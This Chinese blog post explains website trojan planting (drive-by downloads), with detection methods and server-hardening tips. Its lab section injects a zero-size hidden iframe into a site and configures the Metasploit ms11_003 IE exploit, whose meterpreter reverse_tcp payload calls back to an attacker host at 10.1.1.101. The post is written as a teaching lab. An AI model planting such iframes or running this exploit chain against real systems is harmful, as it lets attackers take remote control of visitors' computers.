专栏首页黑白天安全团队网站挂马原理及实战

网站挂马原理及实战

注:本文仅供学习参考

网页挂马简介 网页挂马指的是把一个木马程序上传到一个网站里面,然后用木马生成器生成一个网马,放到网页空间里面,再加代码使得木马在打开网页时运行。

网页挂马工作原理 作为网页挂马的散布者,其目的是将木马下载到用户本地并进一步执行,当木马得到执行后,就意味着会有更多的木马被下载,且进一步被执行。这样就进入一个恶性的循环,从而使用户的电脑遭到攻击和控制。为达到目的首先要将木马下载到本地。

常见方式

1将木马伪装为页面元素,木马则会被浏览器自动下载到本地。

2利用脚本运行的漏洞下载木马。

3利用脚本运行的漏洞释放隐含在网页脚本中的木马。

4将木马伪装成缺失的组件,或和缺失的组件捆绑在一起,如flash播放插件。这样既达到了下载的目的,下载的组件又会被浏览器自动执行。

5通过脚本运行调用某些com组件,利用其漏洞下载木马。

6在渲染页面内容的过程中,利用格式溢出释放木马,如ani格式溢出漏洞。

7在渲染页面内容的过程中,利用格式溢出下载木马,如flash9.0.115播放漏洞。

检测方式

  1特征匹配:将网页挂马的脚本按脚本病毒进行检测,但是网页脚本变形方式、加密方式比起传统的PE格式病毒更为多样,检测起来也更加困难。

  2主动防御:当浏览器要进行某些动作时,作出提示,如下载了某插件的安装包,会提示是否运行。比如浏览器创建暴风影音播放器时,提示是否允许运行,大多数情况下用户会点击是,网页木马会因此得到执行。

  3检查父进程是否为浏览器,这种方法很容易被躲过且会对很多插件造成误报。

网站挂马实验 准备win7实验机和kali kali ip地址为10.1.1.101 1.将以下代码插进我们准备的网站中

<iframe src=地址 width=0 height=0></iframe>

将宽度高度都设为0,这个地址就会变成透明,不查看源代码的话是发现不了的 这里的网马地址设置为http://10.1.1.101:8060/test.html当用户访问到我们这个地址时,会自动访问http://10.1.1.101:8060/test.html,木马会被浏览下载到本地

2.利用ms11_003IE漏洞攻击win7主机 执行命令

use exploit/windows/browser/ ms11_003_ie_css_import’,选择漏洞利用EXP
设置SRVPORT URIPATH与网马中的src一致
set SRVPORT 8060
set URIPATH test.html
运行命令set payload windows/meterpreter/reverse_tcp 设置攻击载荷进行回连
set lhost 10.1.1.101 设置回连的IP地址
set lport 1234设置回连端口号
show options
最后设置完看下图

执行run命令 好戏上场 这时打开win7实验机,打开IE,模拟受害者访问http://10.1.1.101/index.html

在kali端成功看到受害者主机上线

成功使用sysinfo查看主机信息

使用Screenshot查看win7实验机的屏幕截图(win7待机了)

包括后面收集信息属于后渗透环节,本文不做讨论。

防御措施

1对开放上传附件功能的网站,一定要进行身份认证,并只允许信任的人使用上传程序。

2保证所使用的程序及时地更新。

3不要在前台网页加注后台管理程序登录页面的链接。

4时常备份数据库等文件,但是不要把备份数据放在程序默认的备份目录下。

5管理员的用户名和密码要有一定复杂性。

6 IIS中禁止目录的写入和执行功能,可以有效防止asp木马。

7在服务器、虚拟主机控制面板设置执行权限选项中,将有上传权限的目录取消asp的运行权限。

8创建一个robots.txt上传到网站根目录,Robots能够有效防范利用搜索引擎窃取信息的骇客。

本文分享自微信公众号 - 黑白天(li0981jing)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-03-04

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 简单的NAT实验

    最近有在学习华为安全,无奈R/S的基础太差了,但是还是要慢慢的补回来的。 这个实验简单的用到了vlan划分,ospf和源NAT和目的NAT技术,也只是很基础很基...

    黑白天安全
  • SQL注入的原理

    Sql注入攻击  SQL注入攻击通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作...

    黑白天安全
  • 某次网站的渗透测试

    对此网站进行SQL注入测试之后发现这个网站是没有WAF之类的防护软件进行包含网站的,那么我就直接使用SQLMAP进行SQL注入测试。SQLMAP给出网站的指纹信...

    黑白天安全
  • CTF实战23 木马攻击技术

    值得注意的是,木马屠城记并非于古希腊诗人荷马的两部著作伊利亚特与奥德赛里记载,而是在罗马帝国时期的诗人维吉尔所写的史诗《埃涅阿斯纪》中, 才第一次被记载

    用户1631416
  • 来自云端的木马:“百家”木马集团分析

    0×00背景 近日,腾讯反病毒实验室拦截到一批伪装成客户通知单的木马,该木马会根据自身文件名的不同而进行多种不同的恶意行为,经测试,目前国内的多款杀毒软件尚不能...

    FB客服
  • 手把手 | 用Python写成的MCR乐队敲诈者木马:这种操作很朋克!

    大数据文摘
  • 木马到底是什么,看完这个你还说和你没关系吗?

    如果说勒索病毒是当下“最火”的病毒。那“木马病毒”一定是最常见的病毒了。今天我们就来简单聊聊木马病毒。

    用户6477171
  • 神话传奇:一款通过卖号在微信群传播的远控木马

    近期,360安全卫士监测到了一批通过微信群传播的远控木马,木马针对在网上倒卖微信号的人群定向投放。卖号人的交流群里时常有不同的小号在散播诱导性的木马程序,不知情...

    FB客服
  • 计算机木马是如何产生的?原理是什么?

    作为一个从业十几年的程序员来分析下计算机木马原理,计算机木马原来称呼为特洛伊木马,主要流传于古希腊,攻城不对久攻不下,于是让人专门制作了一个体积非常大的马,把士...

    程序员互动联盟
  • 木马病毒介绍 Trojans virus backdoor rootkit

    木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。木马这个名字来源...

    周俊辉

扫码关注云+社区

领取腾讯云代金券